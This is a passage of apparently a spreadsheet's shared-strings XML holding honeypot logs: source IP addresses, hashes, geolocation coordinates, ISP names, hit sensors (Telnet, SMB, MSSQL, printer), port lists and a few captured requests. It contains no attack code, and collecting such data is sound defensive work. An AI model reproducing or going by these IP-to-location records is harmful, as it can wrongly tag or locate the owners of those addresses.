  </si>
  <si>
    <t>7bc2ea049fc13d3abca9280378b2e374</t>
  </si>
  <si>
    <t>141.196.133.184</t>
  </si>
  <si>
    <t>Umraniye</t>
  </si>
  <si>
    <t>738377</t>
  </si>
  <si>
    <t>::ffff:8dc4:85b8</t>
  </si>
  <si>
    <t>46083ebbf00bd6b426fa7b7001729683</t>
  </si>
  <si>
    <t>117.206.95.229</t>
  </si>
  <si>
    <t>::ffff:75ce:5fe5</t>
  </si>
  <si>
    <t>dee3034117fe3e36da3abefaf3536e77</t>
  </si>
  <si>
    <t>114.33.163.172</t>
  </si>
  <si>
    <t>114-33-163-172.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_DNS_H27&amp;&amp;SMA-LAB_MT-CPA_H10&amp;&amp;SMA-LAB_HTTP_H12&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_HTTP_H8&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H39</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;53&amp;&amp;58423&amp;&amp;80&amp;&amp;23&amp;&amp;NA&amp;&amp;9100</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '185.250.150.39:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_PJL:NA}</t>
  </si>
  <si>
    <t>::ffff:7221:a3ac</t>
  </si>
  <si>
    <t>2f365553b23c75d5fee879712e7e868b</t>
  </si>
  <si>
    <t>123.25.85.149</t>
  </si>
  <si>
    <t>Nghệ An Province</t>
  </si>
  <si>
    <t>Thành Phố Vinh</t>
  </si>
  <si>
    <t>Yên Vinh</t>
  </si>
  <si>
    <t>1560037</t>
  </si>
  <si>
    <t>18.6667</t>
  </si>
  <si>
    <t>105.667</t>
  </si>
  <si>
    <t>::ffff:7b19:5595</t>
  </si>
  <si>
    <t>03441cffb73e6b318208fd99911ef9e3</t>
  </si>
  <si>
    <t>117.193.250.249</t>
  </si>
  <si>
    <t>::ffff:75c1:faf9</t>
  </si>
  <si>
    <t>9dc0d42c15d7eadf588a92a188e7378f</t>
  </si>
  <si>
    <t>117.235.234.64</t>
  </si>
  <si>
    <t>::ffff:75eb:ea40</t>
  </si>
  <si>
    <t>12d7b976616abd200c69df740e051aa4</t>
  </si>
  <si>
    <t>185.213.154.186</t>
  </si>
  <si>
    <t>Gothenburg Municipality</t>
  </si>
  <si>
    <t>Gothenburg</t>
  </si>
  <si>
    <t>2711537</t>
  </si>
  <si>
    <t>400 10</t>
  </si>
  <si>
    <t>57.7089</t>
  </si>
  <si>
    <t>11.9746</t>
  </si>
  <si>
    <t>2017-07-19</t>
  </si>
  <si>
    <t>::ffff:b9d5:9aba</t>
  </si>
  <si>
    <t>1926c0f1f831141deb11d0593781b9a3</t>
  </si>
  <si>
    <t>120.56.9.237</t>
  </si>
  <si>
    <t>::ffff:7838:9ed</t>
  </si>
  <si>
    <t>66fed20992f05ea90a760634b5d53618</t>
  </si>
  <si>
    <t>45.184.71.64</t>
  </si>
  <si>
    <t>45-184-71-64.canaatelecom.net.br&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_MT-CPA_H38</t>
  </si>
  <si>
    <t>23&amp;&amp;21776&amp;&amp;NA</t>
  </si>
  <si>
    <t>269359</t>
  </si>
  <si>
    <t>CANAA TELECOMUNICAÇÕES LTDA - ME</t>
  </si>
  <si>
    <t>::ffff:2db8:4740</t>
  </si>
  <si>
    <t>8d6fcc3bf602fc3856b106404d3f46d9</t>
  </si>
  <si>
    <t>191.56.70.48</t>
  </si>
  <si>
    <t>Várzea Paulista</t>
  </si>
  <si>
    <t>3445446</t>
  </si>
  <si>
    <t>-23.2114</t>
  </si>
  <si>
    <t>-46.8283</t>
  </si>
  <si>
    <t>Claro S.A.</t>
  </si>
  <si>
    <t>::ffff:bf38:4630</t>
  </si>
  <si>
    <t>521250124c7010ee47bdd311c5124839</t>
  </si>
  <si>
    <t>117.214.79.61</t>
  </si>
  <si>
    <t>::ffff:75d6:4f3d</t>
  </si>
  <si>
    <t>df05131edbc6e2a78666a5c5d5054ea0</t>
  </si>
  <si>
    <t>59.91.37.36</t>
  </si>
  <si>
    <t>::ffff:3b5b:2524</t>
  </si>
  <si>
    <t>da2bd9d27a82c6d4f9c5a529522fd216</t>
  </si>
  <si>
    <t>117.205.92.196</t>
  </si>
  <si>
    <t>::ffff:75cd:5cc4</t>
  </si>
  <si>
    <t>fb2f83986f1b1ffc19a2c1ef2a55015f</t>
  </si>
  <si>
    <t>49.130.171.34</t>
  </si>
  <si>
    <t>1819607</t>
  </si>
  <si>
    <t>::ffff:3182:ab22</t>
  </si>
  <si>
    <t>469d1b58af92efebe3ed98ee0c7f4839</t>
  </si>
  <si>
    <t>117.254.25.131</t>
  </si>
  <si>
    <t>::ffff:75fe:1983</t>
  </si>
  <si>
    <t>dfa6eab76065775147f3896ae018420b</t>
  </si>
  <si>
    <t>45.249.68.20</t>
  </si>
  <si>
    <t>1270396</t>
  </si>
  <si>
    <t>22.5769</t>
  </si>
  <si>
    <t>88.3186</t>
  </si>
  <si>
    <t>2016-05-10</t>
  </si>
  <si>
    <t>::ffff:2df9:4414</t>
  </si>
  <si>
    <t>841025b5feb933f6f4f7f4599b6f81a9</t>
  </si>
  <si>
    <t>116.72.16.50</t>
  </si>
  <si>
    <t>::ffff:7448:1032</t>
  </si>
  <si>
    <t>eadf33df4461e79235bbed752021e57d</t>
  </si>
  <si>
    <t>116.73.38.158</t>
  </si>
  <si>
    <t>East</t>
  </si>
  <si>
    <t>Shakar Pur Baramad</t>
  </si>
  <si>
    <t>13156977</t>
  </si>
  <si>
    <t>28.6208</t>
  </si>
  <si>
    <t>77.2794</t>
  </si>
  <si>
    <t>::ffff:7449:269e</t>
  </si>
  <si>
    <t>42bbd37467f04214da227269004f6404</t>
  </si>
  <si>
    <t>124.141.206.253</t>
  </si>
  <si>
    <t>124-141-206-253.rev.home.ne.jp&amp;&amp;NA</t>
  </si>
  <si>
    <t>2006-03-02</t>
  </si>
  <si>
    <t>JTCL-JP</t>
  </si>
  <si>
    <t>::ffff:7c8d:cefd</t>
  </si>
  <si>
    <t>fed0546467027e4c647005eb3496a6ae</t>
  </si>
  <si>
    <t>117.212.171.166</t>
  </si>
  <si>
    <t>::ffff:75d4:aba6</t>
  </si>
  <si>
    <t>3fa6f20a5eae1e9c7b950dca9bb6e9ed</t>
  </si>
  <si>
    <t>117.198.12.164</t>
  </si>
  <si>
    <t>::ffff:75c6:ca4</t>
  </si>
  <si>
    <t>9da78644c85906831d2b56686210b07d</t>
  </si>
  <si>
    <t>103.60.232.42</t>
  </si>
  <si>
    <t>-6.89529</t>
  </si>
  <si>
    <t>150504</t>
  </si>
  <si>
    <t>PT CIGS Indonesia Digital</t>
  </si>
  <si>
    <t>CIGS</t>
  </si>
  <si>
    <t>::ffff:673c:e82a</t>
  </si>
  <si>
    <t>9ee53faa4915420280485df9726dcaeb</t>
  </si>
  <si>
    <t>182.56.236.122</t>
  </si>
  <si>
    <t>::ffff:b638:ec7a</t>
  </si>
  <si>
    <t>6c1ca9e5b0501738905e9863442957c5</t>
  </si>
  <si>
    <t>59.92.178.8</t>
  </si>
  <si>
    <t>::ffff:3b5c:b208</t>
  </si>
  <si>
    <t>b2c643cd2c8f3b2430dc58c83bddd5d2</t>
  </si>
  <si>
    <t>117.214.40.2</t>
  </si>
  <si>
    <t>::ffff:75d6:2802</t>
  </si>
  <si>
    <t>f3a8171629cb281c85f6837391576056</t>
  </si>
  <si>
    <t>220.135.166.129</t>
  </si>
  <si>
    <t>NA&amp;&amp;220-135-166-129.hinet-ip.hinet.net</t>
  </si>
  <si>
    <t>SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H3&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H19</t>
  </si>
  <si>
    <t>::ffff:dc87:a681</t>
  </si>
  <si>
    <t>fa31cdc621b262dfe6ce2907d2f29010</t>
  </si>
  <si>
    <t>46.153.215.169</t>
  </si>
  <si>
    <t>::ffff:2e99:d7a9</t>
  </si>
  <si>
    <t>c46e7315592691bc62df09f57e9c2acd</t>
  </si>
  <si>
    <t>101.109.167.108</t>
  </si>
  <si>
    <t>node-x2k.pool-101-109.dynamic.totinternet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>::ffff:656d:a76c</t>
  </si>
  <si>
    <t>86dc468ebb1def6f5f9223864f57cba4</t>
  </si>
  <si>
    <t>194.127.199.45</t>
  </si>
  <si>
    <t>Møre og Romsdal</t>
  </si>
  <si>
    <t>Ulsteinvik weather</t>
  </si>
  <si>
    <t>8468896</t>
  </si>
  <si>
    <t>62.3434</t>
  </si>
  <si>
    <t>5.84385</t>
  </si>
  <si>
    <t>BLIXCUST10412</t>
  </si>
  <si>
    <t>::ffff:c27f:c72d</t>
  </si>
  <si>
    <t>dea81f6429e921b71e892007a368b82b</t>
  </si>
  <si>
    <t>59.95.132.12</t>
  </si>
  <si>
    <t>::ffff:3b5f:840c</t>
  </si>
  <si>
    <t>e1aa19d62ab15c65d215ef272e60ae7e</t>
  </si>
  <si>
    <t>211.246.132.238</t>
  </si>
  <si>
    <t>::ffff:d3f6:84ee</t>
  </si>
  <si>
    <t>d5e8a5683c49589bc54c5cfc80b6d29b</t>
  </si>
  <si>
    <t>78.176.178.171</t>
  </si>
  <si>
    <t>40.9811</t>
  </si>
  <si>
    <t>29.0631</t>
  </si>
  <si>
    <t>::ffff:4eb0:b2ab</t>
  </si>
  <si>
    <t>42dc7ea1bf9fcd384dbab0c58eceeeb2</t>
  </si>
  <si>
    <t>117.204.157.173</t>
  </si>
  <si>
    <t>::ffff:75cc:9dad</t>
  </si>
  <si>
    <t>ad3d4824e6f7687af4c4f12126b8b65f</t>
  </si>
  <si>
    <t>218.102.121.75</t>
  </si>
  <si>
    <t>pcd589075.netvigator.com&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_HC1</t>
  </si>
  <si>
    <t>2001-10-25</t>
  </si>
  <si>
    <t>::ffff:da66:794b</t>
  </si>
  <si>
    <t>25b44217b1168a97a26078fced57347b</t>
  </si>
  <si>
    <t>120.61.254.36</t>
  </si>
  <si>
    <t>::ffff:783d:fe24</t>
  </si>
  <si>
    <t>d3980f16c6532442e482ea74aba7831a</t>
  </si>
  <si>
    <t>118.232.88.54</t>
  </si>
  <si>
    <t>NA&amp;&amp;118-232-88-54.dynamic.kbronet.com.tw</t>
  </si>
  <si>
    <t>SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H30</t>
  </si>
  <si>
    <t>23&amp;&amp;53135</t>
  </si>
  <si>
    <t>TUNGHO</t>
  </si>
  <si>
    <t>TUNG HO MULTIMEDIA CO. Ltd.</t>
  </si>
  <si>
    <t>login&amp;&amp;NA</t>
  </si>
  <si>
    <t>2025-08-27 00:00:00</t>
  </si>
  <si>
    <t>::ffff:76e8:5836</t>
  </si>
  <si>
    <t>ad6a9e49740bbcfd7b0627f4eb89df88</t>
  </si>
  <si>
    <t>177.36.240.89</t>
  </si>
  <si>
    <t>::ffff:b124:f059</t>
  </si>
  <si>
    <t>260ee440e8edc760db93141bb129cd24</t>
  </si>
  <si>
    <t>61.84.187.135</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_SSH_H24&amp;&amp;SMA-LAB_MT-CPA_H44&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_HC1</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;22&amp;&amp;31790&amp;&amp;NA&amp;&amp;40451</t>
  </si>
  <si>
    <t>::ffff:3d54:bb87</t>
  </si>
  <si>
    <t>be4a830839c4acfd06fc111f5f6cec05</t>
  </si>
  <si>
    <t>125.27.11.89</t>
  </si>
  <si>
    <t>node-28p.pool-125-27.dynamic.nt-isp.net</t>
  </si>
  <si>
    <t>::ffff:7d1b:b59</t>
  </si>
  <si>
    <t>136e24493daf310892d730951f6ad21e</t>
  </si>
  <si>
    <t>170.244.44.158</t>
  </si>
  <si>
    <t>SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H14</t>
  </si>
  <si>
    <t>23&amp;&amp;NA&amp;&amp;46950&amp;&amp;50512&amp;&amp;49722&amp;&amp;53828&amp;&amp;54036&amp;&amp;54022</t>
  </si>
  <si>
    <t>Fernandes Tourinho</t>
  </si>
  <si>
    <t>3460688</t>
  </si>
  <si>
    <t>-19.1526</t>
  </si>
  <si>
    <t>-42.0802</t>
  </si>
  <si>
    <t>266479</t>
  </si>
  <si>
    <t>CONNECT FIBRA</t>
  </si>
  <si>
    <t>Connect Fibra</t>
  </si>
  <si>
    <t>::ffff:aaf4:2c9e</t>
  </si>
  <si>
    <t>6af88904e19e4ddbd6b2cc854cb3c000</t>
  </si>
  <si>
    <t>27.107.1.98</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MT-CPA_H33&amp;&amp;SMA-LAB_MSSQL_H13&amp;&amp;SMA-LAB_MSSQL_HC1</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;16612&amp;&amp;1433&amp;&amp;445</t>
  </si>
  <si>
    <t>Talegaon Dābhāde</t>
  </si>
  <si>
    <t>1255134</t>
  </si>
  <si>
    <t>18.735</t>
  </si>
  <si>
    <t>73.6756</t>
  </si>
  <si>
    <t>Tata Teleservices Limited</t>
  </si>
  <si>
    <t>Tata Teleservices Limited -GSM Division</t>
  </si>
  <si>
    <t>2010-06-07</t>
  </si>
  <si>
    <t>TATA-DOCOMO-IN</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (27.107.1.98,54516)}&amp;&amp;{Data_SMB:Incoming connection (27.107.1.98,55157)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}</t>
  </si>
  <si>
    <t>::ffff:1b6b:162</t>
  </si>
  <si>
    <t>99dc3f0db6d0bf44fd34896228973c08</t>
  </si>
  <si>
    <t>88.249.95.65</t>
  </si>
  <si>
    <t>::ffff:58f9:5f41</t>
  </si>
  <si>
    <t>d1e72dad741ed3d4754412c7a86d1de6</t>
  </si>
  <si>
    <t>117.247.25.36</t>
  </si>
  <si>
    <t>::ffff:75f7:1924</t>
  </si>
  <si>
    <t>44b5153fb94fbc64d8b8d3fbfeb0a5cb</t>
  </si>
  <si>
    <t>117.214.140.206</t>
  </si>
  <si>
    <t>::ffff:75d6:8cce</t>
  </si>
  <si>
    <t>63b3add1ce5d2b557bc6fd3ff928afd7</t>
  </si>
  <si>
    <t>59.188.105.227</t>
  </si>
  <si>
    <t>059188105227.ctinets.com&amp;&amp;NA</t>
  </si>
  <si>
    <t>NWT</t>
  </si>
  <si>
    <t>::ffff:3bbc:69e3</t>
  </si>
  <si>
    <t>0653e570fb20eabda9ec083773d63c06</t>
  </si>
  <si>
    <t>59.88.94.70</t>
  </si>
  <si>
    <t>::ffff:3b58:5e46</t>
  </si>
  <si>
    <t>0f5905ac184868d60a712057c0ae2363</t>
  </si>
  <si>
    <t>117.216.28.88</t>
  </si>
  <si>
    <t>::ffff:75d8:1c58</t>
  </si>
  <si>
    <t>ea2d5f907e6abca51c854dabc75d583d</t>
  </si>
  <si>
    <t>103.75.32.33</t>
  </si>
  <si>
    <t>134319</t>
  </si>
  <si>
    <t>Elyzium Technologies Pvt. Ltd.</t>
  </si>
  <si>
    <t>Elyzium Softech</t>
  </si>
  <si>
    <t>{Data_MSSQl:NA}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}</t>
  </si>
  <si>
    <t>::ffff:674b:2021</t>
  </si>
  <si>
    <t>ac70e393ed6f32c369482198a8e8840d</t>
  </si>
  <si>
    <t>202.179.92.75</t>
  </si>
  <si>
    <t>SMA-LAB_PJL_HC1&amp;&amp;SMA-LAB_MSSQL_H43</t>
  </si>
  <si>
    <t>9100&amp;&amp;1433&amp;&amp;1080&amp;&amp;1521&amp;&amp;45388&amp;&amp;3389&amp;&amp;60827&amp;&amp;27401&amp;&amp;58674&amp;&amp;24947&amp;&amp;26368&amp;&amp;47476&amp;&amp;38227&amp;&amp;59629&amp;&amp;32606&amp;&amp;25287&amp;&amp;52441&amp;&amp;51891&amp;&amp;56067&amp;&amp;50333&amp;&amp;55527&amp;&amp;52551&amp;&amp;63156&amp;&amp;22638&amp;&amp;61251&amp;&amp;52846&amp;&amp;24666&amp;&amp;54125&amp;&amp;52826&amp;&amp;54157&amp;&amp;58144&amp;&amp;51560&amp;&amp;55115&amp;&amp;50499&amp;&amp;57463&amp;&amp;51882&amp;&amp;58408&amp;&amp;59153&amp;&amp;53912&amp;&amp;55793&amp;&amp;51901&amp;&amp;31634&amp;&amp;31930&amp;&amp;36579&amp;&amp;57343&amp;&amp;32308&amp;&amp;51581&amp;&amp;54665&amp;&amp;55197&amp;&amp;63002&amp;&amp;53774&amp;&amp;62949&amp;&amp;48596&amp;&amp;50002&amp;&amp;28143&amp;&amp;49364&amp;&amp;32654&amp;&amp;42376&amp;&amp;46535&amp;&amp;64327&amp;&amp;60988&amp;&amp;53411&amp;&amp;30238&amp;&amp;24836&amp;&amp;30014&amp;&amp;38904&amp;&amp;39559&amp;&amp;37811&amp;&amp;41388&amp;&amp;37137&amp;&amp;38643&amp;&amp;49948&amp;&amp;62520&amp;&amp;60106&amp;&amp;29555&amp;&amp;45733&amp;&amp;42168&amp;&amp;54864&amp;&amp;53557&amp;&amp;23464&amp;&amp;47712&amp;&amp;61377&amp;&amp;57859&amp;&amp;22038&amp;&amp;25244&amp;&amp;50629&amp;&amp;56056&amp;&amp;55733&amp;&amp;56149&amp;&amp;50481&amp;&amp;49882&amp;&amp;58828&amp;&amp;22519&amp;&amp;55004&amp;&amp;51048&amp;&amp;55576&amp;&amp;63803&amp;&amp;56325&amp;&amp;50445&amp;&amp;29493&amp;&amp;27859&amp;&amp;29304&amp;&amp;62210&amp;&amp;57291&amp;&amp;54539&amp;&amp;52132&amp;&amp;55425&amp;&amp;57552&amp;&amp;57502&amp;&amp;50093&amp;&amp;51946&amp;&amp;59588&amp;&amp;64591&amp;&amp;62367&amp;&amp;49597&amp;&amp;54657&amp;&amp;30747&amp;&amp;65516&amp;&amp;31605&amp;&amp;57850&amp;&amp;51256&amp;&amp;53891&amp;&amp;60178&amp;&amp;30743&amp;&amp;55276&amp;&amp;55241&amp;&amp;28240&amp;&amp;62152&amp;&amp;52939&amp;&amp;25439&amp;&amp;26241&amp;&amp;28021&amp;&amp;56775&amp;&amp;24081&amp;&amp;52935&amp;&amp;53125&amp;&amp;52281&amp;&amp;50549&amp;&amp;60418&amp;&amp;37742&amp;&amp;51167&amp;&amp;30986&amp;&amp;51812&amp;&amp;61658&amp;&amp;54255&amp;&amp;59256&amp;&amp;55896&amp;&amp;60516&amp;&amp;59195&amp;&amp;28552&amp;&amp;27467&amp;&amp;51915&amp;&amp;65290&amp;&amp;63061&amp;&amp;64697&amp;&amp;48619&amp;&amp;49581&amp;&amp;51622&amp;&amp;63125&amp;&amp;56105&amp;&amp;56486&amp;&amp;52086&amp;&amp;57319&amp;&amp;64060&amp;&amp;60107&amp;&amp;49207&amp;&amp;49463&amp;&amp;51251&amp;&amp;51754&amp;&amp;55130&amp;&amp;48774&amp;&amp;48645&amp;&amp;22187&amp;&amp;56423&amp;&amp;53696&amp;&amp;49904&amp;&amp;49192&amp;&amp;54970&amp;&amp;61917&amp;&amp;52553&amp;&amp;24231&amp;&amp;56589&amp;&amp;62060&amp;&amp;53717&amp;&amp;61458&amp;&amp;45031&amp;&amp;46083&amp;&amp;53983&amp;&amp;62122&amp;&amp;57017&amp;&amp;55418&amp;&amp;64330&amp;&amp;53703&amp;&amp;64437&amp;&amp;33758&amp;&amp;57243&amp;&amp;52904&amp;&amp;30418&amp;&amp;51964&amp;&amp;39566&amp;&amp;49379&amp;&amp;51873&amp;&amp;64079&amp;&amp;59412&amp;&amp;38786&amp;&amp;47918&amp;&amp;56055&amp;&amp;53149&amp;&amp;57022&amp;&amp;33650&amp;&amp;63270&amp;&amp;49729&amp;&amp;50649&amp;&amp;25238&amp;&amp;28649&amp;&amp;59332&amp;&amp;50180&amp;&amp;54781&amp;&amp;51687&amp;&amp;51309&amp;&amp;31892&amp;&amp;58738&amp;&amp;61191&amp;&amp;63011&amp;&amp;53223&amp;&amp;58780&amp;&amp;24977&amp;&amp;57203&amp;&amp;50295&amp;&amp;26878&amp;&amp;62901&amp;&amp;55458&amp;&amp;59103&amp;&amp;41772&amp;&amp;45838&amp;&amp;64544&amp;&amp;58219&amp;&amp;62863&amp;&amp;33982&amp;&amp;44620&amp;&amp;61762&amp;&amp;26248&amp;&amp;56357&amp;&amp;61322&amp;&amp;29592&amp;&amp;36248&amp;&amp;56951&amp;&amp;28020&amp;&amp;38059&amp;&amp;63152&amp;&amp;63122&amp;&amp;61132&amp;&amp;31544&amp;&amp;50952&amp;&amp;54055&amp;&amp;45852&amp;&amp;49240&amp;&amp;61616&amp;&amp;29132&amp;&amp;63492&amp;&amp;24394&amp;&amp;55664&amp;&amp;54177&amp;&amp;56237&amp;&amp;35266&amp;&amp;43112&amp;&amp;23698&amp;&amp;35138&amp;&amp;32186&amp;&amp;28607&amp;&amp;60838&amp;&amp;43107&amp;&amp;25316&amp;&amp;60850&amp;&amp;54228&amp;&amp;58084&amp;&amp;64959&amp;&amp;24219&amp;&amp;58060&amp;&amp;63481&amp;&amp;64341&amp;&amp;37308&amp;&amp;60712&amp;&amp;47736&amp;&amp;54444&amp;&amp;30970&amp;&amp;61194&amp;&amp;57688&amp;&amp;51423&amp;&amp;50349&amp;&amp;56943&amp;&amp;40583&amp;&amp;62471&amp;&amp;49131&amp;&amp;54995&amp;&amp;32631&amp;&amp;63768&amp;&amp;32098&amp;&amp;36258&amp;&amp;34382&amp;&amp;36964&amp;&amp;34025&amp;&amp;40142&amp;&amp;52658&amp;&amp;36309&amp;&amp;38359&amp;&amp;49177&amp;&amp;64174&amp;&amp;34687&amp;&amp;51947&amp;&amp;54920&amp;&amp;63303&amp;&amp;65413&amp;&amp;22724&amp;&amp;23278&amp;&amp;54156&amp;&amp;59918&amp;&amp;60892&amp;&amp;53055&amp;&amp;25837&amp;&amp;57811&amp;&amp;54891&amp;&amp;58425&amp;&amp;28142&amp;&amp;65275&amp;&amp;44014&amp;&amp;43629&amp;&amp;44771&amp;&amp;60797&amp;&amp;40329&amp;&amp;53547&amp;&amp;43077&amp;&amp;50080&amp;&amp;40526&amp;&amp;53997&amp;&amp;54174&amp;&amp;49939&amp;&amp;57776&amp;&amp;51210&amp;&amp;59282&amp;&amp;21136&amp;&amp;51924&amp;&amp;48831&amp;&amp;53113&amp;&amp;54315&amp;&amp;51082&amp;&amp;32040&amp;&amp;64504&amp;&amp;53949&amp;&amp;22257&amp;&amp;60616&amp;&amp;58663&amp;&amp;26189&amp;&amp;57601&amp;&amp;64645&amp;&amp;48935&amp;&amp;61188&amp;&amp;21633&amp;&amp;65043&amp;&amp;20869&amp;&amp;51886&amp;&amp;48688&amp;&amp;43853&amp;&amp;65307&amp;&amp;25907&amp;&amp;26769&amp;&amp;64999&amp;&amp;53589&amp;&amp;20811&amp;&amp;63614&amp;&amp;21971&amp;&amp;48247&amp;&amp;57708&amp;&amp;57109&amp;&amp;47521&amp;&amp;60698&amp;&amp;25747&amp;&amp;20849&amp;&amp;25757&amp;&amp;55297&amp;&amp;31512&amp;&amp;63826&amp;&amp;28061&amp;&amp;62306&amp;&amp;62195&amp;&amp;30637&amp;&amp;31511&amp;&amp;21086&amp;&amp;52671&amp;&amp;51638&amp;&amp;36216&amp;&amp;39958&amp;&amp;21896&amp;&amp;37866&amp;&amp;52870&amp;&amp;37249&amp;&amp;52229&amp;&amp;64244&amp;&amp;49703&amp;&amp;63458&amp;&amp;49530&amp;&amp;48905&amp;&amp;50278&amp;&amp;58460&amp;&amp;64420&amp;&amp;60924&amp;&amp;34032&amp;&amp;49697&amp;&amp;43893&amp;&amp;45183&amp;&amp;51895&amp;&amp;52944&amp;&amp;31796&amp;&amp;25533&amp;&amp;36322&amp;&amp;26858&amp;&amp;57759&amp;&amp;52921&amp;&amp;34812&amp;&amp;62565&amp;&amp;58498&amp;&amp;31358&amp;&amp;46950&amp;&amp;38542&amp;&amp;51501&amp;&amp;33243&amp;&amp;61966&amp;&amp;54294&amp;&amp;26859&amp;&amp;59797&amp;&amp;62679&amp;&amp;31777&amp;&amp;51248&amp;&amp;33823&amp;&amp;28533&amp;&amp;62788&amp;&amp;52985&amp;&amp;60277&amp;&amp;48798&amp;&amp;60383&amp;&amp;54456&amp;&amp;46598&amp;&amp;50144&amp;&amp;61747&amp;&amp;45373&amp;&amp;58296&amp;&amp;55667&amp;&amp;48245&amp;&amp;47581&amp;&amp;46753&amp;&amp;61437&amp;&amp;50108&amp;&amp;55038&amp;&amp;44449&amp;&amp;44730&amp;&amp;53710&amp;&amp;63316&amp;&amp;35476&amp;&amp;54475&amp;&amp;41380&amp;&amp;55459&amp;&amp;55644&amp;&amp;62657&amp;&amp;58895&amp;&amp;60507&amp;&amp;35891&amp;&amp;30173&amp;&amp;35435&amp;&amp;53208&amp;&amp;61649&amp;&amp;35023&amp;&amp;57013&amp;&amp;34586&amp;&amp;63530&amp;&amp;25874&amp;&amp;62283&amp;&amp;22029&amp;&amp;64201&amp;&amp;56095&amp;&amp;20850&amp;&amp;63306&amp;&amp;56371&amp;&amp;59183&amp;&amp;54556&amp;&amp;57533&amp;&amp;60024&amp;&amp;51643&amp;&amp;55821&amp;&amp;62264&amp;&amp;55322&amp;&amp;23968&amp;&amp;24218&amp;&amp;24705&amp;&amp;54543&amp;&amp;26464&amp;&amp;28384&amp;&amp;60429&amp;&amp;57060&amp;&amp;51580&amp;&amp;57978&amp;&amp;27538&amp;&amp;50833&amp;&amp;45223&amp;&amp;38549&amp;&amp;39627&amp;&amp;51713&amp;&amp;60269&amp;&amp;39860&amp;&amp;32645&amp;&amp;55214&amp;&amp;51219&amp;&amp;24845&amp;&amp;52203&amp;&amp;25677&amp;&amp;65202&amp;&amp;61590&amp;&amp;26142&amp;&amp;57443&amp;&amp;61732&amp;&amp;54120&amp;&amp;55561&amp;&amp;58129&amp;&amp;62259&amp;&amp;58252&amp;&amp;50096&amp;&amp;63654&amp;&amp;52382&amp;&amp;53754&amp;&amp;57065&amp;&amp;57238&amp;&amp;56807&amp;&amp;62538&amp;&amp;63997&amp;&amp;34126&amp;&amp;44849&amp;&amp;45116&amp;&amp;52130&amp;&amp;47967&amp;&amp;21335&amp;&amp;54356&amp;&amp;61539&amp;&amp;53187&amp;&amp;25371&amp;&amp;44503&amp;&amp;39118&amp;&amp;50823&amp;&amp;6074